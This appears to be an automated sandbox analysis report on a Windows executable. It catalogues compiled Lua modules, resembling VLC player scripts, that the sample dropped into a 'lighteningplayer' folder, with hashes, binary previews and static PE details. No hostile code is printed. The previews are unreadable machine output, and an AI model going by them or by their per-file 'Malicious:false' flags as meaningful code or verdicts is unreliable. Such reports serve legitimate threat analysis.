                                                                                                                                                                                      Preview: .LuaQ.......=...@../../extras/package/win32/../../../share/lua/intf/luac.lua............. ....@..........A....@......A....@..$....@...@.......@............A.E....................AB...B.@....A..!@............B...C..@...............usage......To compile a lua script to bytecode (luac) run:. vlc -I luaintf --lua-intf --lua-config 'luac={input="file.lua",output="file.luac"}'.Output will be similar to that of the luac command line tool provided with lua with the following arguments:. luac -o file.luac file.lua.......require......string......io......compile......gmatch......([^.]+).*......vlc......msg......err......misc......quit.........#...:.......Z........@@...@.A....@.......@@...@.A....@.................U....@.......@@...@.A@...@................U....@........A...............B..@...........@@...B.A....@...........@..E...F........@...........@@...B...........A.A...........@...............@D................@...........A@...B.A.........B.........U....A...............AE.......E.......
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\intf\modules\host.luac
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:Lua bytecode, version 5.1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):12639
                                                                                                                                                                                      Entropy (8bit):4.3808726164835115
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:MMMiTMpF2BfxytRAfHaUI0TBD2gHZeC+pm4le:/DTw2BfxydkT4Y
                                                                                                                                                                                      MD5:C8FCA481585D2A65287871B0D8DE4EDC
                                                                                                                                                                                      SHA1:DE49833F5DA2524EC12D20C4E3C80571E492FB31
                                                                                                                                                                                      SHA-256:D9130E5C70B64E14B2FBDA19A1F726D81427246942663B4DC3FBAD33F9DE6233
                                                                                                                                                                                      SHA-512:810EF10F1724BB7C5B0D6A4CF418E2CF98FA8458555FE9A943FEDA3CF2A387D8C5C6D7EF0F84932524C99F618321DFE149581C30D938C726E7C5AB70DB38EEB2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .LuaQ.......E...@../../extras/package/win32/../../../share/lua/intf/modules/host.lua.....................A@........@..@.............................B......C.....@..$.......$@...@...............module......host......package......seeall......status......init...............read.........?.....write.........@.....password.........@.....client_type......net......stdio......fifo......telnet.........@.....is_flag_set.........F...O....................@......P.....@..........@..........................................@........?........@........G...H...H...I...J...K...L...L...L...L...L...L...L...N...N...O...........val.............flag.............bit.................Q...p.......B.......J...........$A..d...........$B..d...................$C..d...................................................................$D..d............................................E..B.......E.......\...I...........J...I...I...I...I...IE..I...................................setfenv......newproxy......getmetatable..
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\intf\modules\httprequests.luac
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:Lua bytecode, version 5.1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):18542
                                                                                                                                                                                      Entropy (8bit):4.662692977433414
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:e6LulKXpBz+F4upzyyyyyNsssssoEp2BBifCYvuuuuuuuTT17whNR8LNZlBku:fulKXpBEiKeQDvuuuuuuuTTaNR8xZ5
                                                                                                                                                                                      MD5:F37B5246A994C2CCBDD4C81565699905
                                                                                                                                                                                      SHA1:574CCC51162C86A642BFF919E4ACCBF59D391EB8
                                                                                                                                                                                      SHA-256:BAA8410F89BC3491267E61F310EFAAEEA1BD1ECCC84324B3FDE1DF5742C87C08
                                                                                                                                                                                      SHA-512:1E6BE290DDEAAD7310ABD7F9E7B832246F78ABA49111146E0853DFD48E5BD4C97C9369BD7F3EFC21A57858EBC3F582A1CDB3F46A784D84FDE34B9EE60EF25A1F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .LuaQ.......M...@../../extras/package/win32/../../../share/lua/intf/modules/httprequests.lua.............+.......A@........@..@......A@......E.......\................@...............@.......................@.......................@..........@......................@......................module......httprequests......package......seeall......require......common......dkjson......round......strsplit......processcommands......xmlString......removeArrayIndicators......printTableAsJson......printTableAsXml......getplaylist......parseplaylist......playlisttable......getbrowsetable......getstatus.........!...).......#................@@...........@...........................@..........@A............@.............................@...................................type......string......us_tonumber......number......math......floor......pow........$@........?....#..."..."..."..."..."...#...#...#...#...#...%...%...%...%...%...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&..
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\intf\telnet.luac
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:Lua bytecode, version 5.1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1002
                                                                                                                                                                                      Entropy (8bit):4.370898931671847
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:X8CHK006SC7lSuGYm9B87QWyMr3/TH7q7RWdiIZvXq4/JlUPPNDIIII1l/C9ryMq:MX0XlmY68yMr3/rXd7/1/oHNDn42yGl
                                                                                                                                                                                      MD5:722FA7EAA4086A34116DD6AE05588648
                                                                                                                                                                                      SHA1:8B8B813F4CE8CF229A30BABAE02DDD81C0201A89
                                                                                                                                                                                      SHA-256:474D67CD6C624E85FB408850147D1A8ABD669C78952854DEE89CB64D3371D4AE
                                                                                                                                                                                      SHA-512:EBB1B7C8BA572B703252DAFD55B2A97E4C80C22CE93C6250969DFA9CB6765C8A714BB33C1D4F8839EAF7F96649B41DFBF01F34D2F898CDF9CD0A1ABEAF17BB37
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .LuaQ.......?...@../../extras/package/win32/../../../share/lua/intf/telnet.lua.............@........@@...@...........@...@......................@@...@..@......J.........@.b@...@...@..E...F@..........W.A..@..E...F........A..\...W....@..W...............................................AB..................A.....!....@........C.............E@...@...............config......hosts.......host......telnet://localhost:4212......pairs......*console......string......match......^%s*(.-)://......telnet......telnet://......gsub......^%s*.-://......vlm......vlc......dofile......wrapped_file.....@........................................................................................................... ... ...!...!...!...!...!..."..."..."..."...#...$...$...%...%...%...%...'...'...'...'...'...'...'...*...*...*.......,...1...1...1...1...3...3...3...3...........(for generator).....8.......(for state).....8.......(for control).....8.......i.....6.......host.....6.......proto.!...6.......newhost.&...6.....
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\meta\art\00_musicbrainz.luac
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:Lua bytecode, version 5.1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2950
                                                                                                                                                                                      Entropy (8bit):4.475212928576038
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:1JmitbKWtmAdY8wRaictRvZ6CCr8881yJo7zGmxRS8VXPoYoYTAYmSSSSSSSI/Jd:6SbKWIq72EJG+zJRrVXEBSSSSSSSIxd
                                                                                                                                                                                      MD5:209C02A2729D3EA9F3E933F33DB91939
                                                                                                                                                                                      SHA1:6CF6E6C702572AF00A86D95A18483816D6E71FA1
                                                                                                                                                                                      SHA-256:805E556ACD26208EECCFD67208A07462C497184DC3BB4CDE721CD2DA2E31328B
                                                                                                                                                                                      SHA-512:F5BC7564094796057BC9B5E31222D4F46568012AC2182775B4297BB022CA4117A5CE2688512E2ABA9DE51508A357D5A28A1D7B6BD8D6674D6EA400CDABCAF919
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .LuaQ.......K...@../../extras/package/win32/../../../share/lua/meta/art/00_musicbrainz.lua.................$.......$@...@..$.......$....................descriptor......try_query......get_releaseid......fetch_art..........................@...@@..................scope......network........................................./.......?...A.......U....@....@..........@...@............@.A............B.@....A......G....A...A................B.@...........G.......................@....A................B.@...............G.......................E....A...........A....D...D.A....A...................%...http://mb.videolan.org/ws/2/release/......vlc......stream......read......P..@.....found......_......string......find......<artwork>true</artwork>......front......<front>true</front>..$...http://coverartarchive.org/release/....../front-500......asin......<asin>(%w+)</asin>..#...http://images.amazon.com/images/P/.......01._SCLZZZZZZZ_.jpg......msg......dbg..G...Neither coverartarchive.org nor amazon have c
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\meta\art\01_googleimage.luac
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:Lua bytecode, version 5.1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1442
                                                                                                                                                                                      Entropy (8bit):4.269687836162008
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:MbgVL0gintomAIl8tV+mtPrt+qR4mlkWEYZXIKw3Tq/SCCCCN8888pmXM:+gitomAIl8tV+mtPrt0mpDSKwTCSCCC0
                                                                                                                                                                                      MD5:5B87647E5B549EFB6771D4E8E334309C
                                                                                                                                                                                      SHA1:0D3B986BBAEC68923C2AC40C034B46FAD3BB92E6
                                                                                                                                                                                      SHA-256:75BCDC91C702EA7590CA196CEA0C790574395DB9892CDC9C68082D5B1DCD2DA5
                                                                                                                                                                                      SHA-512:2F38C8335C217DD14F4BF40471F507522817E53CF1746BDA5B32FEFE38C105B93FE3918D2FE9C3D768E0048A76E9B546143AA9EA64F66C0B8C0E9639B6100AED
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .LuaQ.......K...@../../extras/package/win32/../../../share/lua/meta/art/01_googleimage.lua.................$.......$@...@...............descriptor......fetch_art..........................@...@@..................scope......network.........................................7.......Y........@@...@..@...............@@...@.....F.A..@......F.A.....U...G.......F.A.........F.A..@..U...G.......F.B.Z....@..F.B.Z.......F.B.......B..A..U...G.......F.B.Z....@..F.A.Z.......F.B......A..A..U...G....@..C...^...E...F............@................\...G...E...Z@...@..C...^...E...K....@..\...G...C...G...E...F@..........\@.............G...E...^................vlc......item.......metas......Listing Type......radio......title...... radio logo......tv...... tv logo......artist......album...... ...... cover......fd......stream..#...http://images.google.com/images?q=......strings......encode_uri_component......page......read......P..@....._......arturl......string......find..5...<img height="([0-9]+)" src="([^"
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\meta\art\02_frenchtv.luac
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:Lua bytecode, version 5.1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4377
                                                                                                                                                                                      Entropy (8bit):5.492049941935413
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:2gitzfhQE/Pc9nOnfibkGPSPPTtvaMxq7eLURZ892rFVpUVy/:vSzC2PanOnfiTPShvaMxq7oUnFVp8
                                                                                                                                                                                      MD5:F2C24124C2FD7E0E9F633D6C80502A00
                                                                                                                                                                                      SHA1:50D8A9E6266909D60A9CB64420C2F03812812FAB
                                                                                                                                                                                      SHA-256:314EF84B29B7EBD7F5E5A2A64A31BB4CA22ABA490EB846D9044410E113888B6C
                                                                                                                                                                                      SHA-512:3E25950A2284C17D1AC663682B462D85BE5E1F373821D4ABEDE1561A45B1BA3F88A51CE1579E52E070B6A542519C2E576C8B4B9A68500982B4A870059CE37F20
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .LuaQ.......H...@../../extras/package/win32/../../../share/lua/meta/art/02_frenchtv.lua.................$.......$@...@...............descriptor......fetch_art..........................@...@@..................scope......network.........................................K.......?........@@...@..@A...A..@B...B..@C...C..@D...D..@E...E..@F...F..@G...G..@H...H..@I...I..@J...J..@K...K..@L...L..@M.E...F...K...\........@.......@...@......................AA.........................A..........................A.........................A........TF1..]...https://upload.wikimedia.org/wikipedia/fr/thumb/7/77/TF1_(2013).svg/610px-TF1_(2013).svg.png......France 2..}...https://upload.wikimedia.org/wikipedia/fr/thumb/e/e8/France_2_logo_antenne_(2008).png/270px-France_2_logo_antenne_(2008).png......France 3..m...https://upload.wikimedia.org/wikipedia/fr/thumb/3/33/France_3_logo_2016.svg/275px-France_3_logo_2016.svg.png......Canal+..e...https://upload.wikimedia.org/wikipedia/commons/thumb/1/1a/Canal%2B.sv
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\meta\art\03_lastfm.luac
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:Lua bytecode, version 5.1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1640
                                                                                                                                                                                      Entropy (8bit):4.199652508597613
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:fN8git6mXEffnemtPJTgeuRRUCCCCCM88888g:LS6m+pceKa
                                                                                                                                                                                      MD5:ECCDE037E0F76C68F3C51513B396E28E
                                                                                                                                                                                      SHA1:FA6EDFB2E7E8A8C65EF72CDA4AD67DE3C2FFE0A0
                                                                                                                                                                                      SHA-256:7ABD95BE704AE8110EED5221C3985E5C62DF87C551389723C374A70859C3183E
                                                                                                                                                                                      SHA-512:CC09B86CE3026CE6A423B501244D0730B6532FC7C1CCF0DA6D4EB3055AF818D17E64D7CF73AC504E644D55052565C1CB010411271312919CA439C32690722577
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .LuaQ.......F...@../../extras/package/win32/../../../share/lua/meta/art/03_lastfm.lua.................$.......$@...@...............descriptor......fetch_art..........................@...@@..................scope......network.........................................:.......n........@@...@..@...............@@...@.....F.A.W@......F.A......@..C...^...F.A.Z.......F.B.Z....@..E...F...F.....A.\....................B....U...G@...@..C...^...E@..F....@..........\...G@..E@..F....@...@......\...G@..E@..F....@..........\...G@..E@..F....@..........\...G@..E...F@.......@......\...G...E...Z@...@..C...^...E...K....@..\...G...C...G...E@..F........@..\...........G...E...Z.......E@..F...........\...Z....@..C...^...E...^................vlc......item.......metas......Listing Type......radio......tv......artist......album......title......strings......encode_uri_component....../......string......gsub...... ?%-.*............%(.*%)......CD%d+......Disc %w+......fd......stream......http://www.last.fm/music/....
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\meta\reader\filename.luac
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:Lua bytecode, version 5.1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1350
                                                                                                                                                                                      Entropy (8bit):4.008717579188147
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:MoKnqhiQuVGfuT4QUYKAedwOajpm4Ym/Mzo1v4:hhiQuWbQHKNm/oK
                                                                                                                                                                                      MD5:4940745BA8D5327E1C9306D96FBAF4D9
                                                                                                                                                                                      SHA1:51AED602D2C916F6F311F66BC21F4FE11F1713C3
                                                                                                                                                                                      SHA-256:1C4253BB00CBD7877AEBD40AF91C38A22F70F56AD83941AADDCBA6E8C80683B4
                                                                                                                                                                                      SHA-512:C1864FE3C7491604227512CBC7A115EE36655D378413F72D7C5C6CBDD45386E61BB7B49B2925D62DC81D30133D6BA05141E1CD3333361FB2217F6AA8C4B21268
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .LuaQ.......H...@../../extras/package/win32/../../../share/lua/meta/reader/filename.lua.................$.......$@...@..$....................descriptor......trim......read_meta..........................@...@@..................scope......local.....................................................E...F@..............\...^................string......gsub......^%s*(.-)%s*$......%1.................................................s.....................8.......B........@@...@.....F.@.Z...........F.A.Z@...................AB.@.......................GA...A.......A..............E...F........A......\................A@...C............@....B...........A.......A@...C.........A.......A@...C..........A.......A@...C..........A...............vlc......item......metas......title......filename......_......showName......episodeNumber......string......find......(.+)S(%d+)E(%d+).*......trim......gsub......%....... ......set_meta...... S......E......seasonNumber.....B..................."..."..."...#...&...'...
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\modules\common.luac
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:Lua bytecode, version 5.1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7524
                                                                                                                                                                                      Entropy (8bit):3.9390747019832797
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:P/vORGXj3RWlExyUn4ZF2k5wixMMMMMMlye0iY+fcKdCXSQsCu+c8Ph+cU:3aGDy5IkBJY+fbSk+th+V
                                                                                                                                                                                      MD5:975FE0B3ABCD7768BF35BA2E1D3879FC
                                                                                                                                                                                      SHA1:618C6395E25D3B008EC8429FBCFF4382AA84D633
                                                                                                                                                                                      SHA-256:F74176731FF61FFCE6C585112CE97977AF489E4BDB4EE80CADCB014CBBF66ABC
                                                                                                                                                                                      SHA-512:FB318EF9C6BCC9B82079A30617E7F00C645EB979CB89A7ECD8FFF62DFBD355760E4C14779BB208716E5EF0708D16C25A423F0681E170297193E4E7DC7058A920
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .LuaQ.......B...@../../extras/package/win32/../../../share/lua/modules/common.lua.............&.......A@........@..@..$.......$@...@..$.......$.......$.......$@...@..$.......$.......$.......$@...@..$.......$.......$.......$@...@..$.......$....................module......common......package......seeall......pairs_sorted......skip......setarg......hotkey......snapshot......table_copy......us_tonumber......us_tostring......strip......table_print......print_callbacks......durationtostring......realpath......parsetime......seek......volume.........................J....................A.........@....A...........@....@......@.......................................pairs......table......insert......sort........................................@.........D....@..D...............F.......................?........................................................................i.....s.....t.........................................................................................................t......
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\modules\dkjson.luac
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:Lua bytecode, version 5.1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):26008
                                                                                                                                                                                      Entropy (8bit):4.523691683449061
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:8/wxrCpx/qZUr7Yp+pSUGnJBwwwwwwwwwfoSJmefUeOe35MfrIMyRekD6V:EwwpxxskGnXwwwwwwwwwRrceOe36TnV
                                                                                                                                                                                      MD5:F6C2CF57FC5062DAA136E4055794B7B5
                                                                                                                                                                                      SHA1:11D180DFCF0CCE4C48CA3084801EFFFA9F1F6638
                                                                                                                                                                                      SHA-256:019BDEC8648B5537DA417DB99E252FBDC074C30F92ECC08F0D6DD9BF0B99D0EA
                                                                                                                                                                                      SHA-512:FA6CB1F21EBF32CEBA5F63891AD5E3FE6667C87FE835F3B4C142BAB430B5E4A41DC1671FFC7F5E2D93B6CD8509A8CAAB8B31CB40951509DDDC0B32CDBB27DFB1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .LuaQ.......B...@../../extras/package/win32/../../../share/lua/modules/dkjson.lua............,........E....@.........E....A.........E....B...............C.EC..F....C....C..C.......D...DD.ED..F....D....D..D.......E...EE.E...F................EF.......F.....$.......E....F..........J...I...I.......\F......JF..IFH......F...........F...........G..d....G......I........................FI...I..FJ...J..FK...K..FL.$...................dG..........................I...........$.......I.......dH..................$...........................................................I............H..........$...........J...I.I.I.I.II.I.J.I..I.K.I..I.L.................................................dJ..............................$...........................................I...........................................I....................J..^.......=........pairs......type......tostring......tonumber......getmetatable......setmetatable......rawset......error......require......pcall......math......floor......
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\modules\sandbox.luac
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:Lua bytecode, version 5.1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4028
                                                                                                                                                                                      Entropy (8bit):4.193139219783856
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:dmFQc8G4sXLkEepHwdwAE6gxZclM4nHzT4865SSSSkS:i8fgBawdE6YyVnHv486iS
                                                                                                                                                                                      MD5:4C75C09E508544DA7FE3055CEA96AB83
                                                                                                                                                                                      SHA1:31240C372063F1594E0B668F539E90DAB60EBEE5
                                                                                                                                                                                      SHA-256:1C544A29615B0C714596B2182375D66E5F26B28891A4E6CB244B62A5E5A8B448
                                                                                                                                                                                      SHA-512:034959653A2F9EDA6696223E062C57CDB53EC3CE53F6C44E85C1377C6ABB797BCFC2CBB2D5389BCBA47806EAF95893C3DC41C98EDB86FE2C9CBD5462B5312301
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .LuaQ.......C...@../../extras/package/win32/../../../share/lua/modules/sandbox.lua.............O.......A@........@..@.......@A..@A..@...@A..@...@A..@...@A..@...@A..@...@A..@A..@...@A..@A.E............@..d...G...J...................I...............J....A..bA......I...................I...................I...................I........@...A..J...............AB......bA......I........@...A......I....@...........@......#........module......sandbox......package......seeall......collectgarbage........dofile......_G......getfenv......getmetatable......load......loadfile......rawequal......rawget......rawset......setfenv......setmetatable......require......debug......_VERSION......Lua 5.1......loadstring......readonly_table_proxy......coroutine......string......dump......table......math......io......os......exit......getenv......remove......rename......setlocale.........4...K.......(...............@.....................W................@..........J............A..............I.A..................
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\modules\simplexml.luac
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:Lua bytecode, version 5.1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3227
                                                                                                                                                                                      Entropy (8bit):4.246256007383686
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:1w466Al5j3F5WSFZZHpavSSgfTTV2vwZYE:1wZ3f5f9fXV9Y
                                                                                                                                                                                      MD5:A047B5AFD40CDD7CEB13D24C172FD2AE
                                                                                                                                                                                      SHA1:4128C3EDB601FB4DA82C3B2A1882FFE17519B832
                                                                                                                                                                                      SHA-256:638F7A7D0F3689DD8845BDBDA3D925FE507972A99109A1800DF5B3D596C543FD
                                                                                                                                                                                      SHA-512:9536CA581FE146825ED50310E1045E350DFD0EC2656D0751F0920EA023963DD1E2C809D46A85FDD73D2AFE2A428FDFB5F17E4D5124C17ACE501D465B8D98EF39
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .LuaQ.......E...@../../extras/package/win32/../../../share/lua/modules/simplexml.lua.....................A@........@..@..$...d@......G...d.......G@..d.......G...d...G................module......simplexml......package......seeall......parse_url......parse_stream......parse_string......add_name_maps......... ...W............@.......................@@......@.@..........J................@...@A.............J....B..J....B..KB..\...W.........A.....B..........@............@............B.@....B..............@....B...........@C.....................F.A.W@...@..T...........E.......\B..@.................D......B........D...B..B........C......C..@....B...B...........@..............LD.......C..............I.......EB......\.............C...B......C..a.......T....A..E...F.......\B........D...........C.F.B......B......................................A....B...................vlc......xml......create_reader......next_node..................?.....name......attributes......children......next_attr.......ta

                                                                                                                                                                                      Static File Info

                                                                                                                                                                                      General

                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Entropy (8bit):6.696874715069498
                                                                                                                                                                                      TrID:
                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                      File name:yevbZfdCqR.exe
                                                                                                                                                                                      File size:798208
                                                                                                                                                                                      MD5:3568d61a49b61ce18bd6093748ffd32a
                                                                                                                                                                                      SHA1:0f6c4618eb4fca4972869a56bf6d8b020e1440f8
                                                                                                                                                                                      SHA256:af350212764e6304bf417e81cf0009b494119670e4bc1b187cd79cf4c487c7b6
                                                                                                                                                                                      SHA512:5c0129297fe07f919fe228633e193f56167e4f92815aa2cb1b9749ff14f377ec4d5c0414dffc733cbdc0b448e4552e06a527a481a144cd3af413c77fe2937cde
                                                                                                                                                                                      SSDEEP:12288:VoyNaVHKFOOVEWqRZHxv+OeO+OeNhBBhhBBX3rjISihqxk3tkw30cHTnQdncOVE4:VoIalKcf30mhJ9TnJNLTF8fmNLa
                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$>n.`_.^`_.^`_.^t4._u_.^t4._._.^t4._x_.^.0._D_.^...^d_.^k0._._.^k0._q_.^k0._y_.^t4._g_.^`_.^._.^.0._{_.^.0.^a_.^.0._a_.^Rich`_.

                                                                                                                                                                                      File Icon

                                                                                                                                                                                      Icon Hash:00828e8e8686b000

                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                      General

                                                                                                                                                                                      Entrypoint:0x442e85
                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                                      Time Stamp:0x60CC7128 [Fri Jun 18 10:10:48 2021 UTC]
                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                      File Version Major:6
                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                      Import Hash:146d9834dca937c5740063d6c887d411
                                                                                                                                                                                      Instruction
                                                                                                                                                                                      call 00007F5F34E19D00h
                                                                                                                                                                                      jmp 00007F5F34E196AFh
                                                                                                                                                                                      int3
                                                                                                                                                                                      jmp 00007F5F34E49F46h
                                                                                                                                                                                      and dword ptr [ecx+04h], 00000000h
                                                                                                                                                                                      mov eax, ecx
                                                                                                                                                                                      and dword ptr [ecx+08h], 00000000h
                                                                                                                                                                                      mov dword ptr [ecx+04h], 004942E0h
                                                                                                                                                                                      mov dword ptr [ecx], 004942D8h
                                                                                                                                                                                      ret
                                                                                                                                                                                      push ebp
                                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                                      sub esp, 0Ch
                                                                                                                                                                                      lea ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                                      call 00007F5F34E1980Fh
                                                                                                                                                                                      push 004B52A4h
                                                                                                                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                      push eax
                                                                                                                                                                                      call 00007F5F34E3CB90h
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      push 00466090h
                                                                                                                                                                                      push dword ptr fs:[00000000h]
                                                                                                                                                                                      mov eax, dword ptr [esp+10h]
                                                                                                                                                                                      mov dword ptr [esp+10h], ebp
                                                                                                                                                                                      lea ebp, dword ptr [esp+10h]
                                                                                                                                                                                      sub esp, eax
                                                                                                                                                                                      push ebx
                                                                                                                                                                                      push esi
                                                                                                                                                                                      push edi
                                                                                                                                                                                      mov eax, dword ptr [004B801Ch]
                                                                                                                                                                                      xor dword ptr [ebp-04h], eax
                                                                                                                                                                                      xor eax, ebp
                                                                                                                                                                                      push eax
                                                                                                                                                                                      mov dword ptr [ebp-18h], esp
                                                                                                                                                                                      push dword ptr [ebp-08h]
                                                                                                                                                                                      mov eax, dword ptr [ebp-04h]
                                                                                                                                                                                      mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                      mov dword ptr [ebp-08h], eax
                                                                                                                                                                                      lea eax, dword ptr [ebp-10h]
                                                                                                                                                                                      mov dword ptr fs:[00000000h], eax
                                                                                                                                                                                      ret
                                                                                                                                                                                      mov ecx, dword ptr [ebp-10h]
                                                                                                                                                                                      mov dword ptr fs:[00000000h], ecx
                                                                                                                                                                                      pop ecx
                                                                                                                                                                                      pop edi
                                                                                                                                                                                      pop edi
                                                                                                                                                                                      pop esi
                                                                                                                                                                                      pop ebx
                                                                                                                                                                                      mov esp, ebp
                                                                                                                                                                                      pop ebp
                                                                                                                                                                                      push ecx
                                                                                                                                                                                      ret
                                                                                                                                                                                      push ebp
                                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                                      and dword ptr [004BC99Ch], 00000000h
                                                                                                                                                                                      sub esp, 24h
                                                                                                                                                                                      or dword ptr [004B8010h], 01h
                                                                                                                                                                                      push 0000000Ah
                                                                                                                                                                                      call 00007F5F34E64664h
                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                      je 00007F5F34E199DFh
                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xb75c00x50.rdata
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xbf0000x1e8.rsrc
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xc00000x781c.reloc
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xad7400x38.rdata
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
